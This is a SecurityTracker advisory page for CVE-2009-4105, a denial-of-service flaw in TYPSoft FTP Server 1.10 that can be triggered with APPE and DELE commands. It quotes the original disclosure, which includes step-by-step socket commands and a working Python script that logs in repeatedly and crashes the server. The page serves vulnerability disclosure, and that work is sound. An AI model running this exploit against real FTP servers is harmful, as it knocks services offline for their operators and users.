SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FTP (TYPSoft) Vendors:   TYPSoft
TYPSoft FTP Server APPE and DELE Command Processing Flaw Lets Remote Authenticated Users Deny Service
SecurityTracker Alert ID:  1023234
SecurityTracker URL:  http://securitytracker.com/id/1023234
CVE Reference:   CVE-2009-4105   (Links to External Site)
Updated:  Dec 2 2009
Original Entry Date:  Nov 24 2009
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.10
Description:   A vulnerability was reported in TYPSoft FTP Server. A remote authenticated user can cause denial of service conditions.

A remote authenticated user can issue specially crafted APPE and DELE commands in the same socket connection to cause the target service to crash.

leinakesi at gmail.com reported this vulnerability.

Impact:   A remote authenticated user can cause denial of service conditions on the target system.
Solution:   No solution was available at the time of this entry.
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  TYPSoft FTP Server 'APPE' and 'DELE' Commands Remote DoS Vulnerabilities

Date of Discovery: 24-Nov-2009



Credits:leinakesi[at]gmail.com



Vendor: TYPSoft



Affected:

TYPSoft FTP Server Version 1.10

Earlier versions may also be affected



Overview:

TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when 



"APPE" and "DELE" commands are used in the same socket connection.



Details:

If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to 



Denial of Service attack:



1.sock.connect((hostname, 21))

2.sock.send("user %s\r\n" %username)

3.sock.send("pass %s\r\n" %passwd)

4.sock.send("PORT 127,0,0,1,122,107\r\n")

5.sock.send("APPE "+ test_string +"\r\n")

6.sock.send("DELE "+ test_string +"\r\n")

7.sock.close()





Severity:

High



Exploit example:



#!/usr/bin/python

import socket

import sys

import time



def Usage():

    print ("Usage:  ./expl.py   <local_ip>  <serv_ip>      <Username> <password>\n")

    print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")

    print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")

if len(sys.argv) <> 5:

        Usage()

        sys.exit(1)

else:

    local=sys.argv[1]

    hostname=sys.argv[2]

    username=sys.argv[3]

    passwd=sys.argv[4]

    test_string="a"*30

    ip_every=local.split('.')

    for i in range(1,10000):

        try:

            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            sock.connect((hostname, 21))

        except:

            print ("Connection error!")

            sys.exit(1)

        r=sock.recv(1024)

        print "[+] "+ r

        sock.send("user %s\r\n" %username)

        print "[-] "+ ("user %s\r\n" %username)

        r=sock.recv(1024)

        print "[+] "+ r

        sock.send("pass %s\r\n" %passwd)

        print "[-] "+ ("pass %s\r\n" %passwd)

        r=sock.recv(1024)

        print "[+] "+ r

    

        sock_data.bind((local,31339))

        sock_data.listen(1)

        

        sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + ip_every[3] + ",122,107\r\n")

        print "[-] "+ ("PORT " + local + "122,107\r\n")

        r=sock.recv(1024)

        print "[+] "+ r

            

        sock.send("APPE "+ test_string +"\r\n")

        print "[-] "+ ("APPE "+ test_string +"\r\n")

        r=sock.recv(1024)

        print "[+] "+ r

        

        sock.send("DELE "+ test_string +"\r\n")

        print "[-] "+ ("DELE "+ test_string +"\r\n")

        r=sock.recv(1024)

        print "[+] "+ r    

         

        sock.close()

        sock_data.close()

        time.sleep(2)

                



 



    

    sys.exit(0);











 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC